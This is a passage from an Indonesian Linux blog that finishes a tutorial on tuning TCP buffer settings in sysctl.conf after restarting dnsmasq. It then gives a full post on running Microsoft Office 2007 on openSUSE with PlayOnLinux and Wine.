dengan cara mengetik diterminal : /etc/init.d/dnsmasq restart

Selanjutnya kita edit sysctl.conf 
dengan cara mengetik diterminal : nano /etc/sysctl.conf
dan letakkan script ini pada barisan terakhir :

# increase TCP max buffer size setable using setsockopt() 
net.core.rmem_max = 16777216 
net.core.wmem_max = 16777216 
# increase Linux autotuning TCP buffer limits 
# min, default, and max number of bytes to use 
# set max to at least 4MB, or higher if you use very high BDP paths 
net.ipv4.tcp_rmem = 4096 87380 16777216 
net.ipv4.tcp_wmem = 4096 65536 16777216 
# don’t cache ssthresh from previous connection 
net.ipv4.tcp_no_metrics_save = 1 
net.ipv4.tcp_moderate_rcvbuf = 1 
# recommended to increase this for 1000 BT or higher 
net.core.netdev_max_backlog = 2500 
# for 10 GigE, use this, uncomment below 
# net.core.netdev_max_backlog = 30000 
# Turn off timestamps if you’re on a gigabit or very busy network 
# Having it off is one less thing the IP stack needs to work on 
#net.ipv4.tcp_timestamps = 0 
# disable tcp selective acknowledgements. 
net.ipv4.tcp_sack = 0 
#enable window scaling 
net.ipv4.tcp_window_scaling = 1 

jika sudah tekan ctrl+x lalu ya dan tekan enter 
dan terkhir ketik diterminal : sysctl -p 

Semoga bermanfaat !!!

Rabu, 29 Maret 2017

Menjalankan Aplikasi Windows (Microsoft Office) di Linux dengan Mudah Menggunakan PlayOnLinux

Salah satu jenis dokumen yang sering digunakan di perusahaan untuk berbagi file/dokumen dengan pihak lain adalah Microsoft Office. Adanya aplikasi OpenOffice/LibreOffice yang mampu membaca dan merevisi file Microsoft Office sangat membantu proses share dokumen ini namun adakalanya format yang dibuka/disimpan oleh LibreOffice tidak 100% sama. Jika demikian, alternatif yang paling mungkin adalah menjalankan aplikasi Windows seperti Microsoft Office di Linux.
Salah satu aplikasi yang mudah diinstall dan dipergunakan untuk keperluan ini adalah aplikasi PlayOnLinux. Aplikasi PlayOnLinux menggunakan Wine untuk menjalankan aplikasi yang dimaksud, namun prosesnya dibuat sederhana dan intuitif.
Berikut adalah proses menjalankan Microsoft Office 2007 pada Linux openSUSE 12.2 menggunakan PlayOnLinux.
Catatan : Meski dijalankan di Linux, aplikasi Microsoft Office atau aplikasi lainnya yang bersifat propietary tetap memerlukan lisensi.
  1. Install aplikasi PlayOnLinux. Cara termudah instalasi aplikasi di openSUSE adalah menggunakan fasilitas One-Click-Install. Buka http://software.opensuse.org/search, cari nama playonlinux dan kemudian search. Pilih versi yang sesuai dan klik link 1-Click Install.
    `
  2. Selesai diinstall, jalankan aplikasi tersebut. Jika menu-nya tidak muncul, PlayOnLinux bisa juga dijalankan melalui konsole dengan mengetikkan nama playonlinux di terminal atau konsole.
  3. Saat dijalankan, PlayOnLinux akan mengecek beberapa requirement, misalnya font-font standard Microsoft dan library lainnya, termasuk aplikasi Wine. Kita hanya perlu mengikuti wizardnya saja
    `

    `

    `
  4. Setelah selesai, kita bisa langsung memilih menu instalasi program aplikasi (Install a Program)
  5. Pilih kelompok aplikasi Office jika ingin melakukan instalasi aplikasi Microsoft Office. Selain Microsoft Office, PlayOnLinux juga bisa digunakan untuk menjalankan aplikasi lain seperti DreamWeaver, Flash dan lain-lain. Jangan lupa siapkan CD/DVD untuk installernya
    `
  6. Proses instalasi akan sama persis dengan proses instalasi yang biasa dilakukan di Windows
    `
  7. Setelah selesai, kita bisa langsung menggunakan aplikasi Microsoft Office tersebut
Sebenarnya saya memiliki lisensi CrossOver Office, namun dari pengalaman saya menggunakan kedua aplikasi ini, kelihatannya aplikasi PlayOnLinux memiliki penampilan yang lebih professional dan mudah digunakan (serta free juga) ðŸ™‚ . Yang jelas, aplikasi semacam Wine, PlayOnLinux dan CrossOver Office ini mempermudah proses integrasi sistem antara Linux dan Windows.